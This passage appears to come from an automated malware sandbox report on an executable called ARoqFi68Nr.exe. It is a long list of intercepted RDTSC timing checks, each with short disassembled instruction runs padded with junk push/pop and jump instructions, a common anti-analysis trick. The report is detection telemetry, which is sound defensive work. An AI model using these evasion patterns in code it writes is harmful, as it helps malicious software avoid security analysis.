              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1831 second address: 7C1837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 735F66 second address: 735F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1080 second address: 7C1095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1095 second address: 7C109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C109E second address: 7C10A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1268 second address: 7C128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2F7DEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C154D second address: 7C1552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A38 second address: 7C8A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F08C2F7E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 jmp 00007F9F08C2F7E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007F9F08C2F7D6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A73 second address: 7C8A84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F9F08C2E4B6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A84 second address: 7C8AA0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jno 00007F9F08C2F7D6h 0x0000000f jnc 00007F9F08C2F7D6h 0x00000015 js 00007F9F08C2F7D6h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6B9B second address: 7C6BA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6BA6 second address: 7C6BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6FBA second address: 7C6FC4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2E4BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C756C second address: 7C7570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7570 second address: 7C757C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C757C second address: 7C7580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7580 second address: 7C758F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F08C2E4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C77EE second address: 7C77F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C77F4 second address: 7C7815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F08C2E4C9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7815 second address: 7C782D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7E32 second address: 7C7E73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9F08C2E4C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2E4C5h 0x00000010 push ecx 0x00000011 jmp 00007F9F08C2E4BAh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7E73 second address: 7C7E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8493 second address: 7C84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F9F08C2E4CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 732BD1 second address: 732BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F9F08C2F7D8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 732BE2 second address: 732BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0B39 second address: 7D0B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9F08C2F7D6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0C99 second address: 7D0C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0C9F second address: 7D0CA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0CA7 second address: 7D0CB1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0E14 second address: 7D0E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0E1D second address: 7D0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D152D second address: 7D1535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D1535 second address: 7D1539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D1539 second address: 7D1543 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F08C2F7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D865D second address: 7D8661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D8661 second address: 7D8665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87BB second address: 7D87C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87C0 second address: 7D87C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87C5 second address: 7D87CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7DE390 second address: 7DE3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F08C2F7D6h 0x0000000a jmp 00007F9F08C2F7DDh 0x0000000f popad 0x00000010 jmp 00007F9F08C2F7DAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F9F08C2F7D6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E0FDB second address: 7E0FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E0FE3 second address: 7E1004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2F7D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F9F08C2F7DEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1004 second address: 7E1008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1008 second address: 7E100C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E100C second address: 7E1015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1015 second address: 7E101D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E101D second address: 7E1026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1026 second address: 7E102C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E102C second address: 7E1030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE3E1 second address: 7EE402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9F08C2F7DDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE402 second address: 7EE41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C3h 0x00000007 jp 00007F9F08C2E4B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE41F second address: 7EE46A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9F08C2F7D6h 0x00000009 jmp 00007F9F08C2F7E9h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F9F08C2F7E9h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE46A second address: 7EE473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE473 second address: 7EE47D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0DCA second address: 7F0DD7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2E4B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0726 second address: 7F0761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F9F08C2F7E6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F9F08C2F7D6h 0x00000013 jmp 00007F9F08C2F7E7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0761 second address: 7F0779 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F9F08C2E4BAh 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0779 second address: 7F0781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0781 second address: 7F0785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0785 second address: 7F07AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F9F08C2F7E2h 0x0000000f jnc 00007F9F08C2F7D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0916 second address: 7F091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E2B second address: 7F2E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 jmp 00007F9F08C2F7DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E58 second address: 7F2E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E62 second address: 7F2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jng 00007F9F08C2F7DEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E73 second address: 7F2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E77 second address: 7F2E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F9F08C2F7D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2BB9 second address: 7F2BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95E0 second address: 7F95E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95E6 second address: 7F95F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4BCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95F2 second address: 7F9603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 800CFC second address: 800D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 800D00 second address: 800D05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 808DC7 second address: 808DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9F08C2E4B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807924 second address: 807997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2F7D6h 0x0000000a jnp 00007F9F08C2F7D6h 0x00000010 popad 0x00000011 jmp 00007F9F08C2F7E8h 0x00000016 jp 00007F9F08C2F7E8h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9F08C2F7DDh 0x00000024 pushad 0x00000025 jmp 00007F9F08C2F7DFh 0x0000002a push edi 0x0000002b pop edi 0x0000002c jmp 00007F9F08C2F7DFh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807997 second address: 8079A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F9F08C2E4B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807C96 second address: 807C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807C9C second address: 807CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807CA1 second address: 807CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807CAD second address: 807CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807E1E second address: 807E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F9F08C2F7D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 807E2A second address: 807E3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F9F08C2E4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8080BA second address: 8080C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8080C0 second address: 8080D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4BCh 0x0000000a jp 00007F9F08C2E4B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8080D0 second address: 8080E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 8080E4 second address: 8080EE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2E4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 808B05 second address: 808B23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2F7D6h 0x00000008 jmp 00007F9F08C2F7E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 80CB8E second address: 80CB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 80E48D second address: 80E493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 80E60A second address: 80E60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 80E60E second address: 80E625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F9F08C2F7DCh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 812E12 second address: 812E1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 812E1C second address: 812E22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
